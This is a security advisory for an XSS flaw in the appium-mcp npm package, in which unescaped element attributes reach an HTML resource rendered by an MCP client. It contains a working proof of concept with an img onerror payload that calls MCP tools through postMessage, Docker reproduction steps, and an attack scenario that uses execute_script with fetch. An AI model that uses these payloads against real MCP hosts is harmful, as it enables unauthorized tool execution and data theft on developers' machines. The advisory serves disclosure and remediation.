All vulnerabilities

GHSA-x975-rgx4-5fh4

npm · appium-mcp

Summary

appium-mcp: Unescaped Locator Data XSS in MCP-UI Resource (createLocatorGeneratorUI)

Advisory details

Unescaped Locator Data XSS in MCP-UI Resource (createLocatorGeneratorUI)

Summary

appium-mcp's createLocatorGeneratorUI function interpolates attacker-controlled element attributes — text, content-desc, resource-id, and locator selector values — directly into an HTML template literal without any HTML or JavaScript context escaping. An attacker who controls the UI of the app under test can inject arbitrary HTML and JavaScript into the MCP UI resource returned by the generate_locators tool. When a victim's MCP client renders this resource, the injected script executes and can invoke arbitrary MCP tools via window.parent.postMessage, leading to unauthorized MCP tool execution such as taking screenshots, reading page source, or any other registered capability.

Details

The vulnerability is a stored/reflected cross-site scripting (XSS) issue in the MCP UI generation pipeline.

Vulnerable sink — src/ui/mcp-ui-utils.ts:730–740:

${element.text ? `<p class="element-text"><strong>Text:</strong> ${element.text}</p>` : ''}
${element.contentDesc ? `<p class="element-text"><strong>Content Desc:</strong> ${element.contentDesc}</p>` : ''}
${element.resourceId ? `<p class="element-text"><strong>Resource ID:</strong> <code>${element.resourceId}</code></p>` : ''}
<code class="selector">${selector}</code>
<button class="test-btn" onclick="testLocator('${strategy}', `${selector.replace(/`/g, '\\`')}`)">Test</button>

None of element.text, element.contentDesc, element.resourceId, selector, or strategy are HTML-escaped before insertion. The onclick attribute additionally embeds selector and strategy into an inline JavaScript string using only a backtick-escape that is insufficient to prevent breakout via HTML event attribute syntax or single-quote injection.

By contrast, createPageSourceInspectorUI at src/ui/mcp-ui-utils.ts:911–916 does apply escaping to the page source, confirming that the protection gap in createLocatorGeneratorUI is an oversight, not a design choice.

Complete data flow (source → sink):

  1. src/tools/test-generation/locators.ts:57getPageSource(driver) reads the page source XML from an active Appium session; the connected app is fully attacker-controlled.
  2. src/tools/test-generation/locators.ts:72 — the raw page source is passed to generateAllElementLocators.
  3. src/locators/source-parsing.ts:108 — XML attribute values undergo only newline replacement (attr.value.replace(/(\n)/gm, '\n')); HTML entities such as &lt; are decoded into raw < characters by the XML parser with no re-encoding.
  4. src/locators/generate-all-locators.ts:73–75element.attributes.text, ['content-desc'], and ['resource-id'] are copied verbatim into the locator result object.
  5. src/tools/test-generation/locators.ts:90 — the locator objects are passed to createLocatorGeneratorUI.
  6. src/ui/mcp-ui-utils.ts:730–740 — values are interpolated directly into the HTML response (sink).

The window.parent.postMessage({type:'tool', payload:{toolName:...}}, '*') mechanism used throughout src/ui/mcp-ui-utils.ts:645–695 means any JavaScript executing in the rendered UI resource can invoke registered MCP tools unconditionally.

Remediation requires an HTML-escaping helper (replacing &, <, >, ", ') applied to all element properties in the HTML context, and JSON.stringify for values embedded inside JavaScript string literals in onclick handlers.

PoC

Prerequisites:

  • appium-mcp v1.85.8 or v1.85.9 installed from npm
  • Node.js 20+ with the package built (npm install && npm run build)
  • An MCP client that renders HTML resources returned by generate_locators (e.g., VS Code with the Appium MCP extension, or any WebView-based MCP host)

Static confirmation (no Appium session required):

node --input-type=module <<'EOF'
import { generateAllElementLocators } from './dist/locators/generate-all-locators.js';
import { createLocatorGeneratorUI }   from './dist/ui/mcp-ui-utils.js';

const xml = `<hierarchy>
  <node class="android.widget.TextView"
        clickable="true"
        enabled="true"
        displayed="true"
        text="&lt;img src=x onerror=&quot;window.parent.postMessage({type:'tool',payload:{toolName:'appium_screenshot',params:{}},'*')&quot;&gt;"
        content-desc="&lt;b&gt;xss-in-contentDesc&lt;/b&gt;"
        resource-id="com.attacker.app/&lt;u&gt;xss-resource-id&lt;/u&gt;"/>
</hierarchy>`;

const locators = generateAllElementLocators(xml, true, 'uiautomator2', { fetchableOnly: true });
const html     = createLocatorGeneratorUI(locators);

console.log('UNESCAPED <img src=x onerror= present:', html.includes('<img src=x onerror='));
console.log('UNESCAPED <b> in contentDesc present:  ', html.includes('<b>xss-in-contentDesc</b>'));
console.log('UNESCAPED <u> in resourceId present:   ', html.includes('<u>xss-resource-id</u>'));
EOF

Expected output:

UNESCAPED <img src=x onerror= present: true
UNESCAPED <b> in contentDesc present:   true
UNESCAPED <u> in resourceId present:    true

Dynamic confirmation (Docker, network-isolated):

# Build context is the parent directory (contains repo/ and vuln-001/)
docker build -t appium-mcp-vuln-001 \
  -f vuln-001/Dockerfile \
  reports/npmAI_303_appium__appium-mcp

docker run --rm --network none appium-mcp-vuln-001

The container output confirms:

HTML has unescaped <img src=x onerror= : true
Text paragraph  : <p class="element-text"><strong>Text:</strong> <img src=x onerror="window.parent.postMessage(...)"></p>
│  [PASS] XSS CONFIRMED                                       │
│  createLocatorGeneratorUI inserted the raw <img> XSS tag   │
│  execute the onerror handler, enabling arbitrary MCP tool   │

End-to-end exploitation against a real MCP client:

  1. Attacker publishes or sideloads an Android/iOS app whose UI element text, content-desc, or resource-id attributes contain an XSS payload (e.g., <img src=x onerror="window.parent.postMessage({type:'tool',payload:{toolName:'execute_script',params:{script:'fetch(...)'}},'*')">).
  2. Victim developer connects their Appium MCP server to the attacker's app and calls the generate_locators MCP tool.
  3. The MCP client renders the returned HTML resource in a WebView / iframe.
  4. The injected onerror handler fires and posts a crafted tool message to the parent frame, causing the MCP host to invoke arbitrary registered tools (e.g., appium_screenshot, execute_script, get_page_source) without user confirmation.

Impact

This is a Cross-Site Scripting (XSS) vulnerability. Any developer using appium-mcp with an MCP client that renders HTML resources (the intended workflow for the UI feature) is impacted when they inspect elements from an attacker-controlled application.

Impact scenarios:

  • Arbitrary MCP tool invocation: Injected JavaScript calls window.parent.postMessage with any tool name and parameters, executing MCP tools silently (e.g., taking screenshots, reading page source, executing scripts on the device).
  • Credential and data exfiltration: Via execute_script or screenshot tools, an attacker can extract sensitive data visible on the device screen or in the page source.
  • Lateral movement / persistence: If the MCP host exposes file-system or shell tools, the attacker can escalate to arbitrary code execution on the developer's machine.
  • Supply-chain / CI abuse: Automated test pipelines that call generate_locators against third-party app builds are equally vulnerable; no human interaction beyond running the pipeline is required.

The attack requires no authentication (PR:N), the tool is enabled by default (default-on: Y), and the scope is changed (S:C) because JavaScript executes in the MCP host frame rather than the sandboxed resource.

Reproduction artifacts

Dockerfile

# VULN-001 PoC: Unescaped Locator Data XSS in appium-mcp create

References